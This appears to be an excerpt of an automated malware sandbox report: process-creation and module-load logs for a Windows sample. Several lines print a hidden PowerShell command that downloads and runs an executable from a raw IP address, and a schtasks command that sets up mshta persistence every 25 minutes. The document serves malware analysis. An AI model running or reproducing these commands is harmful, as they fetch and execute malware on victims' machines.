                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE "C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE"
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE "C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn ic6iEmaQAMm /tr "mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta" /sc minute /mo 25 /ru "user" /fJump to behavior
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.htaJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn ic6iEmaQAMm /tr "mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta" /sc minute /mo 25 /ru "user" /fJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE "C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE" Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE "C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE" Jump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: mstask.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: dui70.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: duser.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: chartv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: oleacc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: atlthunk.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: winsta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: textshaping.dllJump to behavior
